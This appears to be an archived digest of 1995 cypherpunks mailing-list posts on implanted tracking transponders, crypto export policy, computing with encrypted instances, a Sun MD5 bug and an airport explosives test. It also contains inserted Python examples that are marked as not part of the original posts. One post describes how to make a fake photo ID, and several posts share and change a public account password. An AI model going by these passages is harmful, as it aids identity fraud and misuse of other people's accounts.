   Thank you for question, exit left to Funway.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Sun, 20 Aug 95 17:11:18 PDT
To: Ford Prefect <remailer@bi-node.zerberus.de>
Subject: Re: your mail
In-Reply-To: <m0sgkM8-0002AfC@bi-node.zerberus.de>
Message-ID: <Pine.BSD/.3.91.950820195401.28752A-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain



My my, Delweiler rides high!

=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Date: Sun, 20 Aug 95 16:59:38 PDT
To: cypherpunks@toad.com
Subject: Secure, reliable (Re: Distributed computing)
In-Reply-To: <14470.9508181605@exe.dcs.exeter.ac.uk>
Message-ID: <199508202359.TAA22611@colon.cis.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain


A couple of months back, someone (Adam Back, perhaps?) made mention of
work on secure, reliable distributed computing on untrusted networks
of untrusted machines. I seem to remember mention of sending out bogus
computations in order to obscure the actual computation being
performed.

I was never able to follow the reference, since all the info available
was the name of a Japanese professor, with no mention of the
university or of any publications I could look up.

Does this work ring a bell with anyone else?

nathan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 20 Aug 95 20:03:00 PDT
To: cypherpunks@toad.com
Subject: Re: A glance at the future of missing child identification
Message-ID: <ac5d434c030210047d03@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:52 PM 8/20/95, Hadmut Danisch wrote:

>These transponders are already used for many years. They inject
>them in pigs and cows to identify them. And some car manufacturers
>put them into the ignition keys as theft protections.

The subcutaneous animal things are only detectable at very short ranges.
Typically, a vet (animal doctor) uses a handheld wand to pick up the
signal. Useful for tracking pets, farm animals, etc.

There have so far been no known uses of this on humans, at least as a matter
of routine. Possibly some developers have tried injecting themselves, for
the usual reasons.

The car system used here in the U.S. is called "Lo-Jack," as in the
opposite of "hijack." I don't see how putting the transponders in ignition
keys would do much to stop theft, but maybe I'm unaware of European
developments. (There are keys with chips in them, acting as electronic
keys, or to make the keys harder to duplicate, but not to track the cars.)

>Technology is not new. Perhaps it is already used for criminals?
>Somewhere I heard that in America criminals are sentenced to stay
>at home because the jails are overfilled. A sender is attached to
>their leg and the police is informed if he leaves his home.

Yes, these exist. Not using the same technology as the transponders used in
pets and livestock, though.

>Perhaps a drug dealer may be more useful if he moves free and
>has a transponder inside which he doesn't know about, than having
>him in jail.

Not technologically feasible at this time, but maybe in several years. Even
so, it wouldn't be hard for his friends to scan him for bugs.

Sure, some will argue that pseudorandom, very intermittent, frequency-agile
signals could be emitted...I say it's a hard problem to escape detection by
antennas a few centimeters away when the signal has to be detectable by
surveillance antennas at least kilometers away, and more likely tens or
hundreds of kilometers away. The infrastructure of antennas is lacking.

>Here in Germany most department stores have big antennas at the
>doors which are normally used to detect thefts. Perhaps these antennas
>also recognize certain people. You can be sure even criminals go to
>department stores, undergrounds, or bus stations. Some hidden antennas
>and it's easy to be on their track.

Implausible. The theft detectors are not picking up specific transponders,
just the "on" or "off" state of the things attached to clothing, books,
CDs, etc. (I say "things" because some of them are strips inserted in
books, some are tag-like things clamped to clothing, etc.)

Again, the infrastructure is lacking. The simple detectors in stores would
have to be upgraded to track more sophisticated transponders. The stores
would have to cooperate, etc. Implausible.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Sun, 20 Aug 95 17:27:52 PDT
To: Mike McNally <m5@dev.tivoli.com>
Subject: Re: CoS Raid on "Copyright Terrorist"
In-Reply-To: <9508151817.AA03464@vail.tivoli.com>
Message-ID: <Pine.BSD/.3.91.950820200557.28752G-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 15 Aug 1995, Mike McNally wrote:

> Ray Cromwell writes:
>  > Nowadays, a $10-20/mo maildrop at places like "Mailboxes, Etc" works fine.
> 
> Mailboxes Etc. insists on getting a picture ID; at least they did last
> time I checked.  Some smaller mom&pop places will take a business card
> (time to break out your Jim Rockford Business Card Fabrication Kit).

Please, all you need is to go down to a computer time rental place that 
has a color scanner and a color printer and you can print any ID you like.
Take a picture of you, scan it in, bring it to a word processor or 
publisher program, write some text next to it like "Anon Y. Mouse Inc.
Joe Sixpack, Vice President of Operations, DOB: 4/1/69" print it, cut the
edges to make it look round, and get it laminated.  Instant I.D.

Worth as much as used toilet paper when it comes to your True Name.

I can do half the operation right now on my home machine.  Just have to 
get the camcorder out and hook it up to the video capture card to get the 
picture, then take it into Publish It Easy, write the text and put the 
picture next to it.  Only thing I'm missing is a color inkjet printer and 
a small laminator, but I can print to a PostScript file, take the file to 
Kinko's or wherever and print it there, buy a laminator for $40 and I'm set.

Hell, another $200 and I can get a decent color printer too.

=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 20 Aug 95 20:17:19 PDT
To: John Young <cypherpunks@toad.com>
Subject: Re: (Fwd) 1995 Nanotechnology Conference
Message-ID: <199508210317.UAA24109@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:45 AM 8/19/95 -0400, John Young wrote:
>
>Fourth Foresight Conference on Molecular Nanotechnology



And what does this have to do with cryptography?

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: solman@MIT.EDU
Date: Sun, 20 Aug 95 17:26:47 PDT
To: rah@shipwright.com (Robert Hettinga)
Subject: Legality of suverting computational cycles via Microsoft
In-Reply-To: <v02120d05ac5d6836b779@[199.0.65.105]>
Message-ID: <9508210026.AA01067@ua.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Does anybody here know if it is illegal to get unwitting users to download
benign viruses via MSN?

Doesn't this sort of hole, by its very nature, make it trivial for people
to violate Europe's future electronic privacy laws? (despite Microsoft's
guarantee that MSN would follow those rules.)

JWS




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 20 Aug 95 20:34:02 PDT
To: cypherpunks@toad.com
Subject: Third World Man
Message-ID: <ac5d49b804021004ff37@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


(Wow! I just trimmed 7 of the 8 names cc:ed on this message I'm quoting...I
think the auto-quoting software most of us use is getting out of hand. The
trimmed recipients were; To: bdavis@thepoint.net, aba@atlas.ex.ac.uk,
davby@ida.liu.se, Damien.Doligez@inria.fr, hfinney@shell.portal.com,
asb@nexor.co.uk)

Anyway...

At 9:19 PM 8/20/95, Adam Shostack wrote:
>| So ... has this proven that the banning of strong crypto is the correct
>| way to go, and that, at least to some, credit card transactions using
>| weak crypto will be acceptable to most (given the ease of getting CC#s
>| other ways)?
>
>        No.  Banning strong crypto will not help; those darn furriners
>are using it anyway.  What it will mean is that the Information
>Infrastructure of the future will bypass the United States, as without
>strong cryptography, it is impossible to build a secure architecture.
>
>        Should the United States wish to relegate itself to the status
>of a third world nation because of terrorists, drug dealers, child
>pornographers and money launderers, that is indeed unfortunate.

The U.S. is not likely to find itself relegated to third world status over
this issue. Rhetorically, I wish it were so, but it just ain't. This
issue--like the McCarthy hearings in the 1950s, the race issue in the '60s,
the Vietnam war in the '60s and '70s, to name a few cases, _sounds_ really
serious. And it is, as those cases were, but predicting the imminent
collapse of American civilization is usually a lose.

There is no way the technological and manufacturing prowess of leading
American companies will be substantially crippled.

I would like to see export laws relaxed, especially as they are seldom
effective, and so on. You know my views.

But the likeliest outcome if strong crypto export remains hard, but import
is unaffected, is that strong crypto will be imported from Europe and
elsewhere.

(It does not violate any laws that I am aware of to have a product for sale
in the U.S. with "hooks" for arbitrary crypto, so long as that product and
the hooks are not _exported_. Naturally, companies like Microsoft, Lotus,
Novell, etc., do not want to have a U.S. version and an export version. But
if they _have_ to, they can. My point is that this would certainly not
relegate the U.S. to Third World status, at least not faster than many
other trends are already doing.)

Several European companies are strong in crypto, of course.

--Tim May


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 20 Aug 95 20:46:09 PDT
To: cypherpunks@toad.com
Subject: Re: Secure, reliable (Re: Distributed computing)
Message-ID: <ac5d4f44050210044cf8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:59 PM 8/20/95, Nathan Loofbourrow wrote:
>A couple of months back, someone (Adam Back, perhaps?) made mention of
>work on secure, reliable distributed computing on untrusted networks
>of untrusted machines. I seem to remember mention of sending out bogus
>computations in order to obscure the actual computation being
>performed.
>
>I was never able to follow the reference, since all the info available
>was the name of a Japanese professor, with no mention of the
>university or of any publications I could look up.
>
>Does this work ring a bell with anyone else?

Joan Feigenbaum, then of Stanford and now of Bell Labs, has worked for many
years on what she calls "computing with encrypted instances."

The canonical example is one where one wishes to send a problem, e.g., a
routing problem a la the Travelling Salesman Problem, to a service for
solving. But one doesn't wish to reveal the cities being considered,
perhaps for business reasons. (The extension of this concern to crypto
should be clear.)

So, one transforms the data set, sends it to the compute services, gets
back an answer, and reverses the transformation.

I've always thought of her work as a kissing cousin to zero knowledge
interactive proof systems, but it evolved along a different path.

A check of her published papers should reveal several summaries. I know
some of her stuff got published in "Crypto Proceedings."

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."

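The transform / outsource / reverse pattern described in the message above,
as an added example that is not part of the original post. It goes beyond the
routing case in the message and uses discrete-logarithm blinding, where the
transformation can be stated exactly; the toy group (P = 467, G = 2) and all
function names are assumptions made for illustration.

```python
import secrets

# Constructed toy parameters (assumptions for illustration): P is a small
# prime and G = 2 generates the whole multiplicative group mod P.
P = 467
G = 2
ORDER = P - 1


def compute_service(y):
    """Untrusted solver: returns x with G**x == y (mod P) by exhaustive search."""
    acc = 1
    for x in range(ORDER):
        if acc == y:
            return x
        acc = acc * G % P
    raise ValueError("y is not in the group")


def transform(y, r):
    """Blind the instance: multiply by G**r, so the service sees log(y) + r."""
    return y * pow(G, r, P) % P


def reverse(answer, r):
    """Undo the blinding on the answer that came back from the service."""
    return (answer - r) % ORDER


def solve_hidden(y, service=compute_service):
    """Transform, outsource, reverse. Returns (x, instance_the_service_saw)."""
    r = secrets.randbelow(ORDER)  # fresh blinding value for every query
    blinded = transform(y, r)
    return reverse(service(blinded), r), blinded


def service_view(y):
    """Every instance the service could receive for y, over all choices of r."""
    return {transform(y, r) for r in range(ORDER)}


if __name__ == "__main__":
    secret_x = 123                 # constructed sample secret
    y = pow(G, secret_x, P)
    x, seen = solve_hidden(y)
    print("recovered exponent:", x, "| instance sent to the service:", seen)
    # The set of possible queries is the same for any two secrets, so a
    # single query tells the service nothing about which one was asked.
    print(service_view(y) == service_view(pow(G, 400, P)))
```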





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 20 Aug 95 18:40:42 PDT
To: cypherpunks@toad.com
Subject: Re: A glance at the future of missing child identification
Message-ID: <199508210136.VAA09171@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9508202052.AA23832@elysion.iaks.ira.uka.de>,
danisch@ira.uka.de (Hadmut Danisch) wrote:

>These transponders are already used for many year. They inject
>them in pigs and cows to identify them. And some car manufacturers
>put the into the ignition keys as theft protections.

Sure, the technology is nothing new. Still, it deserves our attention.

>
>Technology is not new. Perhaps it is already used for criminals?
>Somewhere I heard that in America criminals are sentenced to stay
>at home because the jails are overfilled. A sender is attached to 
>their leg and the police is informed if he leaves his home.

Yes, this is being done. The programs are expected to be extended, because
housing an inmate is expensive.

>But it might be difficult to hide them on x-ray images...

No need to hide them if they are implated voluntary with the first polio
shot or required for ex-cons.

BTW, is there a futures market that allows you to bet real money?

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMDfjCCoZzwIn1bdtAQH7HQGAlqdM9rArQZdn2mYTrOPUHKMQoHPv9sL7
+dwxxBPXSNr0Zr/vdrT/vabc8fHJQSlC
=jraT
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RealAudio Welcome Wagon <welcome@realaudio.com>
Date: Sun, 20 Aug 95 21:49:43 PDT
To: cypherpunks@toad.com
Subject: RealAudio website temporary password
Message-ID: <199508210449.VAA20788@www.realaudio.com>
MIME-Version: 1.0
Content-Type: text/plain


This is an automatic response to your request for a free user account 
on the RealAudio site. Welcome to the world of RealAudio. 

The following temporary password will only be used once, 
in order to activate the username and password you 
selected for yourself during signup. 
To activate your account, please visit our Account Activation page 
at http://www.RealAudio.com/welcome.html
and enter the temporary password in the proper blank. 

The user name you selected is:    

cypherpu

Your temporary RealAudio password is:    

Toledo.Francisco

If you have trouble with the software, please refer to
 the RealAudio FAQ and Technical Notes available at
 http://www.RealAudio.com/help.html

You can also contact us through http://www.RealAudio.com/comment.html

Thank you for becoming a RealAudio user. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Sun, 20 Aug 95 19:50:04 PDT
To: MONTY HARDER <monty.harder@famend.com>
Subject: Re: Certificates/Anonymity/Policy/True Names
In-Reply-To: <8AF7577.0003000342.uuout@famend.com>
Message-ID: <Pine.3.89.9508202240.A620945023-0100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Monty Harder suggests that what the world needs is a CyberNotary.  Fear 
not; the American Bar Association, in cahoots with the U.S. chapter of 
the International Chamber of Commerce, is hard at work at creating 
exactly such a beast.  More details in N weeks, when there are more details.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html
and http://www.law.cornell.edu/jol/froomkin.htm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Sun, 20 Aug 95 13:56:38 PDT
To: cypherpunks@toad.com
Subject: Re: A glance at the future of missing child identification
Message-ID: <9508202052.AA23832@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



These transponders have already been used for many years. They inject
them in pigs and cows to identify them. And some car manufacturers
put them into the ignition keys as theft protection.

Technology is not new. Perhaps it is already used for criminals?
Somewhere I heard that in America criminals are sentenced to stay
at home because the jails are overfilled. A sender is attached to 
their leg and the police is informed if he leaves his home.

Perhaps a drug dealer may be more useful if he moves free and
has a transponder inside which he doesn't know about, than having
him in jail. 

Here in Germany most department stores have big antennas at the
doors which are normally used to detect thefts. Perhaps these antennas
also recognize certain people. You can be sure even criminals go to
department stores, undergrounds, or bus stations. Some hidden antennas
and it's easy to be on their track.

But it might be difficult to hide them on x-ray images...


Brrr, disgusting idea...   :-{


Hadmut 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 20 Aug 95 20:10:43 PDT
To: cypherpunks@toad.com
Subject: Re: Basically F-C-ed
Message-ID: <199508210310.XAA03953@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by usura@replay.com (Alex de Joode) on Mon, 
21 Aug  4:28 AM


>Airport police was very quick to point out that such 
>practices  were legal, now when they do that ......


What, Alex, FC stands for F*cking Counterterrorists, making 
work for themselves?


Oh my, are those bitter out of work XX-cold warriors heeding 
X-feebie Liddy, prolonging the 60's blame-the-radicals payoffs.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 20 Aug 95 20:19:17 PDT
To: cypherpunks@toad.com
Subject: Re: A glance at the future of missing child identification
Message-ID: <199508210319.XAA04795@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


September Wired has an "Updata" on this by Simson Garfinkel, "A 
Chip for Every Child?"


A note says the original story was in Wired 1.6.


Excuse the W-word.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 20 Aug 95 20:38:51 PDT
To: jamesd@echeque.com
Subject: Re: (Fwd) 1995 Nanotechnology Conference
Message-ID: <199508210338.XAA07406@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by jamesd@echeque.com ("James A. Donald") on 
Sun, 20 Aug  8:17 PM


>And what does this have to do with cryptography?


The topic has come up here several times in connection with 
development of molecular computers. It has been suggested that 
there is a link to Len Adelman's work.


But maybe that was just a transparent cover story.


Perhaps it's actually a molecular part of the Waco Vince Foster 
Tom Clancy Pat Robertson Nuclear Weapons Material divulgation.


Thanks for provoking. What do you think? Your lively 
disputations have been missed.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 20 Aug 95 20:42:15 PDT
To: John Young <jya@pipeline.com>
Subject: Re: Basically F-C-ed
In-Reply-To: <199508210310.XAA03953@pipe2.nyc.pipeline.com>
Message-ID: <199508210342.XAA03482@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Let me just point out that this is starting to get afield...

.pm

John Young writes:
> 
> Responding to msg by usura@replay.com (Alex de Joode) on Mon, 
> 21 Aug  4:28 AM
> 
> 
> >Airport police was very quick to point out that such 
> >practices  were legal, now when they do that ......
> 
> 
> What, Alex, FC stands for F*cking Counterterrorists, making 
> work for themselves?
> 
> 
> Oh my, are those bitter out of work XX-cold warriors heeding 
> X-feebie Liddy, prolonging the 60's blame-the-radicals payoffs.
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Sun, 20 Aug 95 20:52:24 PDT
To: michael shiplett <walrus@ans.net>
Subject: Re: Sun's buggy MD5?
Message-ID: <v02130508ac5da8006e75@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 20:45 8/18/95, michael shiplett wrote:
>MD5 test suite:
>MD5 ("") =               f00001c0effffba8429b59d50529097c
>MD5 ("a") =              f00003c0effffba8aec5fcf4284a8dbe
>MD5 ("abc") =            f00005c0effffba896fc8af8ca60a911
>MD5 ("message digest") = f00007c0effffba8f373218f317a9558
>MD5 ("abcdefghijklmnopqrstuvwxyz") = f00009c0effffba896b4f24acb3f4738
>MD5 ("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789")
>= f0000bc0effffba8cef237a614aa457d

There certainly is something VERY wrong. I think that the result is being
reported from a location that is 8 positions left of where it should be
pointing. Position 9 is where the "random" (ie: Probably correct) data
starts. The first 8 positions are f0000Xc0effffba8 (where X increments by 2
for each invocation). Thus this looks like some kind of constant or fixed
work area.
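
The kind of check discussed in the message above, as an added example that is
not part of the original post: it compares the six reported digests with a
reference MD5 (Python's hashlib, an assumption of this example) and looks for
structure that hash output should not have. The function names are
hypothetical.

```python
import hashlib

# Digests exactly as reported in the quoted test-suite output above.
REPORTED = {
    b"": "f00001c0effffba8429b59d50529097c",
    b"a": "f00003c0effffba8aec5fcf4284a8dbe",
    b"abc": "f00005c0effffba896fc8af8ca60a911",
    b"message digest": "f00007c0effffba8f373218f317a9558",
    b"abcdefghijklmnopqrstuvwxyz": "f00009c0effffba896b4f24acb3f4738",
    b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789":
        "f0000bc0effffba8cef237a614aa457d",
}


def known_answer_failures(reported):
    """Inputs whose reported digest differs from the reference MD5."""
    return [msg for msg, hexd in reported.items()
            if hashlib.md5(msg).hexdigest() != hexd]


def constant_hex_positions(digests):
    """Hex positions (0-based) that hold the same character in every digest."""
    return [i for i, column in enumerate(zip(*digests))
            if len(set(column)) == 1]


def counter_like_positions(digests):
    """Positions in the first 8 bytes that rise by a fixed step per call."""
    found = {}
    for i in range(16):
        values = [int(d[i], 16) for d in digests]
        steps = {b - a for a, b in zip(values, values[1:])}
        if len(steps) == 1 and steps != {0}:
            found[i] = steps.pop()
    return found


def offset_by_eight_hits(reported):
    """Count inputs whose reported bytes 8..15 equal reference bytes 0..7.

    That is what a result pointer 8 bytes too low would show if the digest
    itself had been computed correctly.
    """
    return sum(hexd[16:] == hashlib.md5(msg).hexdigest()[:16]
               for msg, hexd in reported.items())


if __name__ == "__main__":
    digests = list(REPORTED.values())
    print("failed known-answer tests:", len(known_answer_failures(REPORTED)))
    print("constant hex positions:", constant_hex_positions(digests))
    print("counter-like positions {pos: step}:", counter_like_positions(digests))
    print("tail equals reference head:", offset_by_eight_hits(REPORTED), "of 6")
```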






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 20 Aug 95 23:56:49 PDT
To: cypherpunks@toad.com
Subject: Re: RealAudio website temporary password
Message-ID: <ac5d7c0b010210048c5e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:00 AM 8/21/95, Anonymous wrote:
>Oops.  Thank you for changing the password.  Shall we not use writecode
>unless the site does not allow "cypherpunks" as the password?  I get it
>now.

Hey, this business of signing up the "Cypherpunks" list for a bunch of
specialized services is getting old.

As guerilla ontology, it's fine. The problem is that all of these messages
about what the official, public password is are cluttering up the mail here
("writecode" is not my idea of an obvious public password).

And some of these public sign-ups generate reflecting messages back to the
list. In terms of scaling, this sucks.

And what's being accomplished?

(I confess that when I first saw this announcement that we had been signed
up with the name "cypherpu" and the temporary passphrase
"Toledo.Francisco," I immediately registered under a different set of
names. Now I see that Lucky Green has done the same thing. Hmhhhh, which
one came first and is recognized by them?)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Sun, 20 Aug 95 21:40:54 PDT
To: cypherpunks@toad.com
Subject: Re: Basically F-C-ed
In-Reply-To: <199508210220.EAA03190@utopia.hacktic.nl>
Message-ID: <Pine.SOL.3.91.950821002322.25327B-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


I don't find it too hard to believe that the Dutch would make a test like 
this.  Security at Schiphol can be pretty intense.  I find it a little 
harder to believe that they would goof and let the bomb-oid get away, but 
mistakes happen.  What I find difficult to swallow is that they would 
*tear* the man's luggage to insert the article.

In my experience, the Dutch are almost obsessively careful in taking care 
of their own property and that of others.

FWIW,

BD

On Mon, 21 Aug 1995, Anonymous wrote:

> 
> FBI Probing Planted Explosive
> 
> 
> Orlando, Fla., August 20 (AP) -- Two explosives were
> planted in a professor's suitcase to test airport
> security measures in Amsterdam, The Netherlands, and were
> discovered when he arrived in Orlando, officials said
> Saturday.
> 
> The professor, Paul Holloway of the University of
> Florida, arrived at Orlando International Airport on
> Friday afternoon and found his suitcase had been torn,
> said Brian Kensel, a special agent with the FBI in Tampa.
> 
> He alerted Northwest Airlines security officials who
> emptied his bag and found the two devices. No detonators
> or fuses were with the materials, posing no danger to
> passengers, Kensel said.
> 
[...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 20 Aug 95 22:16:24 PDT
To: cypherpunks@toad.com
Subject: Re: RealAudio website temporary password
Message-ID: <199508210512.BAA11614@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199508210449.VAA20788@www.realaudio.com>,
welcome@realaudio.com (RealAudio Welcome Wagon) wrote:

>This is an automatic response to your request for a free user account 
>on the RealAudio site. Welcome to the world of RealAudio. 
>
>The following temporary password will only be used once, 
>in order to activate the username and password you 
>selected for yourself during signup. 
>To activate your account, please visit our Account Activation page 
>at http://www.RealAudio.com/welcome.html
>and enter the temporary password in the proper blank. 
>
>The user name you selected is:    
>
>cypherpu

The password has been changed to "cypherpunks"

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMDgVmCoZzwIn1bdtAQF6IwF+INj+evDl7CrkIKHTpozs+8yMixV9fEh4
FvaTNdx/Jl/kWoyrjFTk+oYm85DmVv91
=xB75
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 20 Aug 95 19:20:11 PDT
To: cypherpunks@toad.com
Subject: Basically F-C-ed
Message-ID: <199508210220.EAA03190@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



FBI Probing Planted Explosive


Orlando, Fla., August 20 (AP) -- Two explosives were
planted in a professor's suitcase to test airport
security measures in Amsterdam, The Netherlands, and were
discovered when he arrived in Orlando, officials said
Saturday.

The professor, Paul Holloway of the University of
Florida, arrived at Orlando International Airport on
Friday afternoon and found his suitcase had been torn,
said Brian Kensel, a special agent with the FBI in Tampa.

He alerted Northwest Airlines security officials who
emptied his bag and found the two devices. No detonators
or fuses were with the materials, posing no danger to
passengers, Kensel said.

"We were satisfied that he was unaware of its presence
before it was found at the airport," he added.

Holloway had been attending a professional conference in
Finland and had traveled through Detroit, Michigan,
before arriving in Orlando, Kensel said.

He had stopped in Amsterdam on the way, and that was
where the device was placed, said Kathleen Bergen,
spokeswoman with the Federal Aviation Administration in
Atlanta.

"It was part of a test," she said. "Basically the bag was
inadvertently loaded on board with the explosives still
inside."

Kensel said such security measures were normal for
Europe.

"Particularly in Europe, there are grave concerns about
security issues," he said. "As a result, they do conduct
various security programs regularly. This was part of a
routine check of their own security systems.

"The bag got away from them basically," he said.

-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Sun, 20 Aug 95 19:28:21 PDT
To: cypherpunks@toad.com
Subject: Re: Basically F-C-ed
Message-ID: <199508210228.AA19298@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous sez:

: FBI Probing Planted Explosive


: Orlando, Fla., August 20 (AP) -- Two explosives were
: planted in a professor's suitcase to test airport
: security measures in Amsterdam, The Netherlands, and were
: discovered when he arrived in Orlando, officials said
: Saturday.

[..]
: Kensel said such security measures were normal for
: Europe.

